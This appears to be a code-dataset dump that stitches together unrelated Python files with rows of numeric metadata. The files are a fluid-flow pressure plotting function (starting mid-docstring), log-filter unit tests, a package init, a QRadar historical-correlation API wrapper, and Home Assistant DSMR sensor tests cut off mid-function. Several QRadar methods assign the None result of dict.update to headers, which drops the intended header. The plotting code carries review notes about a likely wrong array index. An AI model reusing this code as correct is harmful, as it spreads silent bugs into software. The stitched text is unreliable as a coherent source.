    >>> my_fluid_flow = fluid_flow_example()
    >>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
    array([[...
    >>> ax = matplot_pressure_theta_cylindrical(my_fluid_flow, z=int(my_fluid_flow.nz/2))
    >>> # to show the plots you can use:
    >>> # plt.show()
    """
    # Refuse to plot before either pressure matrix has been computed.
    if (
        not fluid_flow_object.numerical_pressure_matrix_available
        and not fluid_flow_object.analytical_pressure_matrix_available
    ):
        raise ValueError(
            "Must calculate the pressure matrix. "
            "Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
        )
    # Pick the requested matrix, falling back to whichever one exists.
    # NOTE(review): the docstring promises a warning on fallback, but none
    # is raised here — confirm whether a warnings.warn call is missing.
    if from_numerical:
        if fluid_flow_object.numerical_pressure_matrix_available:
            p_mat = fluid_flow_object.p_mat_numerical
        else:
            p_mat = fluid_flow_object.p_mat_analytical
    else:
        if fluid_flow_object.analytical_pressure_matrix_available:
            p_mat = fluid_flow_object.p_mat_analytical
        else:
            p_mat = fluid_flow_object.p_mat_numerical
    if ax is None:
        fig, ax = plt.subplots(subplot_kw=dict(projection="polar"))
    # Radial grid: from the origin out to the stator radius (+0.0001 so the
    # stator radius itself is included by np.arange's half-open interval).
    r = np.arange(
        0,
        fluid_flow_object.radius_stator + 0.0001,
        (fluid_flow_object.radius_stator - fluid_flow_object.radius_rotor) / fluid_flow_object.nradius,
    )
    # Angular grid covering a full revolution, offset by -pi/4.
    theta = np.arange(-np.pi * 0.25, 1.75 * np.pi + fluid_flow_object.dtheta / 2, fluid_flow_object.dtheta)
    # NOTE(review): pressure is read from plane 0 (p_mat[0][i]) while the
    # inner radius below uses plane z — confirm whether p_mat[z][i] was
    # intended here.
    pressure_along_theta = np.zeros(fluid_flow_object.ntheta)
    for i in range(0, fluid_flow_object.ntheta):
        pressure_along_theta[i] = p_mat[0][i]
    min_pressure = np.amin(pressure_along_theta)
    r_matrix, theta_matrix = np.meshgrid(r, theta)
    z_matrix = np.zeros((theta.size, r.size))
    inner_radius_list = np.zeros(fluid_flow_object.ntheta)
    pressure_list = np.zeros((theta.size, r.size))
    # Fill the annulus: cells inside the rotor boundary are skipped (stay 0);
    # outside it, each cell carries the pressure at its theta, shifted so
    # every plotted value is positive (min subtracted, +0.01 offset).
    for i in range(0, theta.size):
        inner_radius = np.sqrt(
            fluid_flow_object.xri[z][i] * fluid_flow_object.xri[z][i] + fluid_flow_object.yri[z][i] * fluid_flow_object.yri[z][i]
        )
        inner_radius_list[i] = inner_radius
        for j in range(0, r.size):
            if r_matrix[i][j] < inner_radius:
                continue
            pressure_list[i][j] = pressure_along_theta[i]
            z_matrix[i][j] = pressure_along_theta[i] - min_pressure + 0.01
    ax.contourf(theta_matrix, r_matrix, z_matrix, cmap="coolwarm")
    ax.set_title("Pressure along Theta; Z=" + str(z))
    return ax
def matplot_pressure_theta(fluid_flow_object, z=0, ax=None):
    """Plot the pressure along theta at a fixed z using matplotlib.

    Draws the numerically calculated pressure in blue and/or the
    analytically calculated pressure in red, whichever is available.

    Parameters
    ----------
    fluid_flow_object: a FluidFlow object
    z: int, optional
        The distance along z-axis to be considered.
    ax : matplotlib axes, optional
        Axes in which the plot will be drawn.

    Returns
    -------
    ax : matplotlib axes
        Returns the axes object with the plot.

    Raises
    ------
    ValueError
        If neither pressure matrix has been calculated yet.

    Examples
    --------
    >>> from ross.fluid_flow.fluid_flow import fluid_flow_example
    >>> my_fluid_flow = fluid_flow_example()
    >>> my_fluid_flow.calculate_pressure_matrix_numerical() # doctest: +ELLIPSIS
    array([[...
    >>> ax = matplot_pressure_theta(my_fluid_flow, z=int(my_fluid_flow.nz/2))
    >>> # to show the plots you can use:
    >>> # plt.show()
    """
    numerical_ready = fluid_flow_object.numerical_pressure_matrix_available
    analytical_ready = fluid_flow_object.analytical_pressure_matrix_available
    if not numerical_ready and not analytical_ready:
        raise ValueError(
            "Must calculate the pressure matrix. "
            "Try calling calculate_pressure_matrix_numerical() or calculate_pressure_matrix_analytical() first."
        )
    if ax is None:
        ax = plt.gca()
    angles = fluid_flow_object.gama[z]
    if numerical_ready:
        ax.plot(angles, fluid_flow_object.p_mat_numerical[z], "b", label="Numerical pressure")
    if analytical_ready:
        ax.plot(angles, fluid_flow_object.p_mat_analytical[z], "r", label="Analytical pressure")
    ax.set_title("Pressure along Theta; Z=" + str(z))
    ax.set_xlabel("Points along Theta")
    ax.set_ylabel("Pressure")
    return ax
| 37.193258
| 129
| 0.656697
| 2,301
| 16,551
| 4.462408
| 0.083877
| 0.149883
| 0.150467
| 0.031554
| 0.874075
| 0.83395
| 0.786229
| 0.762369
| 0.720101
| 0.680658
| 0
| 0.004434
| 0.236904
| 16,551
| 444
| 130
| 37.277027
| 0.808551
| 0.385475
| 0
| 0.452915
| 0
| 0
| 0.145758
| 0.040073
| 0
| 0
| 0
| 0
| 0
| 1
| 0.040359
| false
| 0
| 0.013453
| 0
| 0.09417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a0446a9b92286f87ee008094c0af913a0e74bc8
| 1,652
|
py
|
Python
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 4
|
2020-09-08T08:14:21.000Z
|
2022-01-27T19:22:53.000Z
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 19
|
2018-02-13T05:51:25.000Z
|
2022-03-27T22:48:11.000Z
|
tests/mock/test_system_log_filter.py
|
TeoDV/jj
|
a58d91ad7b37ba3115daea4890190abede8f3353
|
[
"Apache-2.0"
] | 3
|
2017-11-17T13:25:23.000Z
|
2022-02-03T12:57:00.000Z
|
from unittest.mock import Mock, sentinel
import pytest
from jj.mock import SystemLogFilter
from .._test_utils.steps import given, then, when
from ..logs._log_record import TestLogRecord
@pytest.fixture()
def record():
    """Provide a fresh TestLogRecord carrying a sentinel message per test."""
    return TestLogRecord(sentinel.message)
def test_log_filter(record: TestLogRecord):
    """A plain record with no request attached passes the filter."""
    with given:
        filter_under_test = SystemLogFilter()

    with when:
        result = filter_under_test.filter(record)

    with then:
        assert result is True
def test_log_filter_request_without_header(record: TestLogRecord):
    """A record with a request lacking the remote-mock header passes."""
    with given:
        filter_under_test = SystemLogFilter()
        record.jj_request = Mock(headers={})

    with when:
        result = filter_under_test.filter(record)

    with then:
        assert result is True
def test_log_filter_request_with_header(record: TestLogRecord):
    """A record with the x-jj-remote-mock request header is filtered out."""
    with given:
        filter_under_test = SystemLogFilter()
        record.jj_request = Mock(headers={"x-jj-remote-mock": ""})

    with when:
        result = filter_under_test.filter(record)

    with then:
        assert result is False
def test_log_filter_response_without_header(record: TestLogRecord):
    """A record with a response but no remote-mock request header passes."""
    with given:
        filter_under_test = SystemLogFilter()
        record.jj_request = Mock(headers={})
        record.jj_response = Mock()

    with when:
        result = filter_under_test.filter(record)

    with then:
        assert result is True
def test_log_filter_response_with_header(record: TestLogRecord):
    """A record with a response and the remote-mock header is filtered out."""
    with given:
        filter_under_test = SystemLogFilter()
        record.jj_request = Mock(headers={"x-jj-remote-mock": ""})
        record.jj_response = Mock()

    with when:
        result = filter_under_test.filter(record)

    with then:
        assert result is False
| 22.026667
| 67
| 0.672518
| 203
| 1,652
| 5.26601
| 0.17734
| 0.126286
| 0.046773
| 0.074836
| 0.792329
| 0.762395
| 0.762395
| 0.713751
| 0.713751
| 0.713751
| 0
| 0
| 0.24092
| 1,652
| 74
| 68
| 22.324324
| 0.852472
| 0
| 0
| 0.734694
| 0
| 0
| 0.01937
| 0
| 0
| 0
| 0
| 0
| 0.102041
| 1
| 0.122449
| false
| 0
| 0.102041
| 0.020408
| 0.244898
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
0a33b96032b809efbf13c7d5a43aecfb300c3796
| 318
|
py
|
Python
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 47
|
2021-02-17T15:43:51.000Z
|
2022-03-22T00:57:27.000Z
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 57
|
2021-02-18T13:29:30.000Z
|
2022-02-22T23:12:07.000Z
|
pycid/random/__init__.py
|
sbenthall/pycid
|
114e1fdcd4bf97c99ca5718fe5a66bcef41a6baf
|
[
"Apache-2.0"
] | 5
|
2021-03-08T18:45:17.000Z
|
2022-02-07T18:37:54.000Z
|
from pycid.random.random_cid import random_cid, random_cids # noqa
from pycid.random.random_cpd import RandomCPD # noqa
from pycid.random.random_dag import random_dag # noqa
from pycid.random.random_macid import random_macid, random_macids # noqa
from pycid.random.random_macidbase import random_macidbase # noqa
| 53
| 73
| 0.830189
| 48
| 318
| 5.270833
| 0.270833
| 0.177866
| 0.296443
| 0.41502
| 0.395257
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.116352
| 318
| 5
| 74
| 63.6
| 0.900356
| 0.075472
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
0a38333ca36c4cd8768ce3ac1d4305569774fb0f
| 7,913
|
py
|
Python
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 10
|
2019-11-19T21:13:32.000Z
|
2021-11-17T19:35:53.000Z
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 2
|
2021-05-21T16:15:16.000Z
|
2021-07-20T12:34:49.000Z
|
qradar4py/endpoints/historical_correlation.py
|
ryukisec/qradar4py
|
958cdea92709778916f0ff8d84d75b18aaad4a66
|
[
"MIT"
] | 6
|
2020-09-14T13:44:55.000Z
|
2021-11-17T19:35:55.000Z
|
from urllib.parse import urljoin
from qradar4py.endpoints.api_endpoint import QRadarAPIEndpoint
from qradar4py.endpoints.api_endpoint import request_vars
from qradar4py.endpoints.api_endpoint import header_vars
class HistoricalCorrelation(QRadarAPIEndpoint):
"""
The QRadar API endpoint group /historical_correlation and its endpoints.
UNDOCUMENTED
"""
__baseurl = 'historical_correlation/'
    def __init__(self, url, header, verify):
        """Initialize the endpoint group rooted at <url>/historical_correlation/.

        :param url: base URL of the QRadar API
        :param header: default headers passed to every request
        :param verify: TLS certificate verification flag
        """
        # __baseurl is name-mangled to the class; urljoin anchors all
        # endpoint paths under historical_correlation/.
        super().__init__(urljoin(url, self.__baseurl),
                         header,
                         verify)
@request_vars('offense_id', 'fields')
def get_hc_offense_info(self, *, offense_id, fields=None, **kwargs):
"""
GET /historical_correlation/hc_offense_info
Retrieves a historical correlation instance information associated with given offense
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'hc_offense_info')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_event_rules(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_event_rules
Retrieves a list of common/event custom rules that can be added to a historical correlation
profile with a network_event_type of event (0).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_event_rules')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_event_saved_searches(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_event_saved_searches
Retrieves a list of non-aggregated event saved searches that can be added to a historical correlation
profile with a network_event_type of event (0).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_event_saved_searches')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_flow_rules(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_flow_rules
Retrieves a list of common/flow rules that can added to a historical correlation profile with a
network_event_type of flow (1).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_flow_rules')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('fields', 'filter')
def get_potential_flow_saved_searches(self, *, Range=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/potential_flow_saved_searches
Retrieves a list of non-aggregated flow saved searches that can be added to a historical correlation
profile with a network_event_type of flow (1).
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'potential_flow_saved_searches')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('sort', 'fields', 'filter')
def get_profiles(self, *, Range=None, sort=None, fields=None, filter=None, **kwargs):
"""
GET /historical_correlation/profiles
Retrieves a list of historical correlation profiles
UNDOCUMENTED
"""
headers = kwargs.get('headers', {}).update({'Allow-Hidden': True})
function_endpoint = urljoin(self._baseurl, 'profiles')
return self._call('GET', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_profiles(self, *, profileData, fields=None, **kwargs):
    """
    POST /historical_correlation/profiles
    Create a new historical correlation profile
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles')
    return self._call('POST', function_endpoint, json=profileData, headers=headers, **kwargs)
@request_vars('fields')
def get_profiles_by_id(self, id, *, fields=None, **kwargs):
    """
    GET /historical_correlation/profiles/{id}
    Get a Historical Search Profile by Id
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
    return self._call('GET', function_endpoint, headers=headers, **kwargs)
def delete_profiles_by_id(self, id, **kwargs):
    """
    DELETE /historical_correlation/profiles/{id}
    Delete a Historical Correlation Profile by Id
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
    return self._call('DELETE', function_endpoint, headers=headers, **kwargs)
@header_vars('fields')
def post_profiles_by_id(self, id, *, profileData, fields=None, **kwargs):
    """
    POST /historical_correlation/profiles/{id}
    Update a historical correlation profile
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}'.format(id=id))
    return self._call('POST', function_endpoint, json=profileData, headers=headers, **kwargs)
@request_vars('fields')
def post_profiles_runs_by_id(self, id, *, fields=None, **kwargs):
    """
    POST /historical_correlation/profiles/{id}/runs
    Causes the Historical Profile server to run a given historical correlation profile.
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs'.format(id=id))
    return self._call('POST', function_endpoint, headers=headers, **kwargs)
@header_vars('Range')
@request_vars('sort', 'fields', 'filter')
def get_profiles_runs_by_id(self, id, *, Range=None, sort=None, fields=None, filter=None, **kwargs):
    """
    GET /historical_correlation/profiles/{id}/runs
    Retrieves a collection of historical correlation profile run structure for a given profile id.
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs'.format(id=id))
    return self._call('GET', function_endpoint, headers=headers, **kwargs)
@request_vars('fields')
def get_profiles_id_runs_by_run_id(self, id, run_id, *, fields=None, **kwargs):
    """
    GET /historical_correlation/profiles/{id}/runs/{run_id}
    Retrieves a historical correlation profile run structure for a given profile running id.
    UNDOCUMENTED
    """
    # Merge Allow-Hidden into caller headers (fixes dict.update-returns-None bug
    # that dropped the header and duplicated the 'headers' keyword in self._call).
    headers = kwargs.pop('headers', None) or {}
    headers['Allow-Hidden'] = True
    function_endpoint = urljoin(self._baseurl, 'profiles/{id}/runs/{run_id}'.format(id=id, run_id=run_id))
    return self._call('GET', function_endpoint, headers=headers, **kwargs)
| 46.274854
| 110
| 0.664982
| 898
| 7,913
| 5.655902
| 0.106904
| 0.111636
| 0.063989
| 0.071668
| 0.847411
| 0.838354
| 0.799567
| 0.787753
| 0.735184
| 0.683599
| 0
| 0.00112
| 0.210034
| 7,913
| 170
| 111
| 46.547059
| 0.81139
| 0.254012
| 0
| 0.6
| 0
| 0
| 0.131737
| 0.024326
| 0
| 0
| 0
| 0
| 0
| 1
| 0.175
| false
| 0
| 0.05
| 0
| 0.4125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6aa38734b9182e93c53429a4848530d6304e600b
| 54
|
py
|
Python
|
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
Uncommon/Python/__init__.py
|
MattiKemp/Data-Structures-And-Algorithms
|
37a4eb4f092f5a058643ef5ac302fe16d97f84dc
|
[
"Unlicense"
] | null | null | null |
from . import DataStructures
from . import Algorithms
| 18
| 28
| 0.814815
| 6
| 54
| 7.333333
| 0.666667
| 0.454545
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.148148
| 54
| 2
| 29
| 27
| 0.956522
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
6accf7c40da0f0c529732d9106eceb36ae89d950
| 24,037
|
py
|
Python
|
tests/components/dsmr/test_sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 7
|
2019-08-15T13:36:58.000Z
|
2020-03-18T10:46:29.000Z
|
tests/components/dsmr/test_sensor.py
|
basicpail/core
|
5cc54618c5af3f75c08314bf2375cc7ac40d2b7e
|
[
"Apache-2.0"
] | 87
|
2020-07-15T13:43:35.000Z
|
2022-03-23T07:43:10.000Z
|
tests/components/dsmr/test_sensor.py
|
winning1120xx/home-assistant
|
53d4c0ce2d374b5e97bbdc37742656c27adf8eea
|
[
"Apache-2.0"
] | 11
|
2020-12-16T13:48:14.000Z
|
2022-02-01T00:28:05.000Z
|
"""Test for DSMR components.
Tests setup of the DSMR component and ensure incoming telegrams cause
Entity to be updated with new values.
"""
import asyncio
import datetime
from decimal import Decimal
from itertools import chain, repeat
from unittest.mock import DEFAULT, MagicMock
from homeassistant import config_entries
from homeassistant.components.dsmr.const import DOMAIN
from homeassistant.components.sensor import (
ATTR_STATE_CLASS,
DOMAIN as SENSOR_DOMAIN,
STATE_CLASS_MEASUREMENT,
STATE_CLASS_TOTAL_INCREASING,
)
from homeassistant.const import (
ATTR_DEVICE_CLASS,
ATTR_ICON,
ATTR_UNIT_OF_MEASUREMENT,
DEVICE_CLASS_ENERGY,
DEVICE_CLASS_GAS,
DEVICE_CLASS_POWER,
ENERGY_KILO_WATT_HOUR,
STATE_UNKNOWN,
VOLUME_CUBIC_METERS,
)
from homeassistant.helpers import entity_registry as er
from homeassistant.setup import async_setup_component
from tests.common import MockConfigEntry, patch
async def test_setup_platform(hass, dsmr_connection_fixture):
    """Test setup of platform.

    Setting up the sensor platform via YAML should be imported into a
    config entry instead of adding entities through the platform path.
    """
    async_add_entities = MagicMock()
    # Legacy platform-style configuration that should trigger the import flow.
    entry_data = {
        "platform": DOMAIN,
        "port": "/dev/ttyUSB0",
        "dsmr_version": "2.2",
        "precision": 4,
        "reconnect_interval": 30,
    }
    serial_data = {"serial_id": "1234", "serial_id_gas": "5678"}
    # Patch out entry setup and serial validation so no real device is needed.
    with patch(
        "homeassistant.components.dsmr.async_setup_entry", return_value=True
    ), patch(
        "homeassistant.components.dsmr.config_flow._validate_dsmr_connection",
        return_value=serial_data,
    ):
        assert await async_setup_component(
            hass, SENSOR_DOMAIN, {SENSOR_DOMAIN: entry_data}
        )
        await hass.async_block_till_done()
    # Entities must not be added through the platform directly.
    assert not async_add_entities.called
    # Check config entry: exactly one entry created, loaded, and carrying
    # both the YAML data and the discovered serial ids.
    conf_entries = hass.config_entries.async_entries(DOMAIN)
    assert len(conf_entries) == 1
    entry = conf_entries[0]
    assert entry.state == config_entries.ConfigEntryState.LOADED
    assert entry.data == {**entry_data, **serial_data}
async def test_default_setup(hass, dsmr_connection_fixture):
    """Test the default setup.

    Sets up a DSMR 2.2 config entry, pushes a fake telegram through the
    mocked connection's callback, and verifies entity registry entries,
    state values, and sensor attributes.
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        CURRENT_ELECTRICITY_USAGE,
        ELECTRICITY_ACTIVE_TARIFF,
        GAS_METER_READING,
    )
    from dsmr_parser.objects import CosemObject, MBusObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "2.2",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    # Minimal telegram covering power usage, tariff, and gas reading.
    telegram = {
        CURRENT_ELECTRICITY_USAGE: CosemObject(
            [{"value": Decimal("0.0"), "unit": ENERGY_KILO_WATT_HOUR}]
        ),
        ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
        GAS_METER_READING: MBusObject(
            [
                {"value": datetime.datetime.fromtimestamp(1551642213)},
                {"value": Decimal(745.695), "unit": "m3"},
            ]
        ),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Unique ids are derived from the configured serial ids.
    registry = er.async_get(hass)
    entry = registry.async_get("sensor.power_consumption")
    assert entry
    assert entry.unique_id == "1234_Power_Consumption"
    entry = registry.async_get("sensor.gas_consumption")
    assert entry
    assert entry.unique_id == "5678_Gas_Consumption"
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # make sure entities have been created and return 'unknown' state
    power_consumption = hass.states.get("sensor.power_consumption")
    assert power_consumption.state == STATE_UNKNOWN
    assert power_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_POWER
    assert power_consumption.attributes.get(ATTR_ICON) is None
    assert power_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_MEASUREMENT
    assert power_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) is None
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    # ensure entities have new state value after incoming telegram
    power_consumption = hass.states.get("sensor.power_consumption")
    assert power_consumption.state == "0.0"
    assert (
        power_consumption.attributes.get("unit_of_measurement") == ENERGY_KILO_WATT_HOUR
    )
    # tariff should be translated in human readable and have no unit
    power_tariff = hass.states.get("sensor.power_tariff")
    assert power_tariff.state == "low"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
    # check if gas consumption is parsed correctly
    gas_consumption = hass.states.get("sensor.gas_consumption")
    assert gas_consumption.state == "745.695"
    assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
    assert (
        gas_consumption.attributes.get(ATTR_STATE_CLASS) == STATE_CLASS_TOTAL_INCREASING
    )
    assert (
        gas_consumption.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == VOLUME_CUBIC_METERS
    )
async def test_setup_only_energy(hass, dsmr_connection_fixture):
    """Test setup without a gas meter serial id.

    With no serial_id_gas configured, only the power sensor should be
    registered; no gas consumption entity may be created.
    """
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "2.2",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        # note: no "serial_id_gas" key — energy-only configuration
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    registry = er.async_get(hass)
    entry = registry.async_get("sensor.power_consumption")
    assert entry
    assert entry.unique_id == "1234_Power_Consumption"
    # Gas entity must be absent when serial_id_gas is not configured.
    entry = registry.async_get("sensor.gas_consumption")
    assert not entry
async def test_v4_meter(hass, dsmr_connection_fixture):
    """Test if v4 meter is correctly parsed.

    DSMR v4 reports gas via HOURLY_GAS_METER_READING instead of the
    v2.2 GAS_METER_READING reference.
    """
    (connection_factory, transport, protocol) = dsmr_connection_fixture
    from dsmr_parser.obis_references import (
        ELECTRICITY_ACTIVE_TARIFF,
        HOURLY_GAS_METER_READING,
    )
    from dsmr_parser.objects import CosemObject, MBusObject
    entry_data = {
        "port": "/dev/ttyUSB0",
        "dsmr_version": "4",
        "precision": 4,
        "reconnect_interval": 30,
        "serial_id": "1234",
        "serial_id_gas": "5678",
    }
    entry_options = {
        # 0 so telegram updates propagate immediately (no throttling).
        "time_between_update": 0,
    }
    telegram = {
        HOURLY_GAS_METER_READING: MBusObject(
            [
                {"value": datetime.datetime.fromtimestamp(1551642213)},
                {"value": Decimal(745.695), "unit": "m3"},
            ]
        ),
        ELECTRICITY_ACTIVE_TARIFF: CosemObject([{"value": "0001", "unit": ""}]),
    }
    mock_entry = MockConfigEntry(
        domain="dsmr", unique_id="/dev/ttyUSB0", data=entry_data, options=entry_options
    )
    mock_entry.add_to_hass(hass)
    await hass.config_entries.async_setup(mock_entry.entry_id)
    await hass.async_block_till_done()
    # Third positional arg of the connection factory is the telegram callback.
    telegram_callback = connection_factory.call_args_list[0][0][2]
    # simulate a telegram pushed from the smartmeter and parsed by dsmr_parser
    telegram_callback(telegram)
    # after receiving telegram entities need to have the chance to update
    await asyncio.sleep(0)
    # tariff should be translated in human readable and have no unit
    power_tariff = hass.states.get("sensor.power_tariff")
    assert power_tariff.state == "low"
    assert power_tariff.attributes.get(ATTR_DEVICE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_ICON) == "mdi:flash"
    assert power_tariff.attributes.get(ATTR_STATE_CLASS) is None
    assert power_tariff.attributes.get(ATTR_UNIT_OF_MEASUREMENT) == ""
    # check if gas consumption is parsed correctly
    gas_consumption = hass.states.get("sensor.gas_consumption")
    assert gas_consumption.state == "745.695"
    assert gas_consumption.attributes.get(ATTR_DEVICE_CLASS) == DEVICE_CLASS_GAS
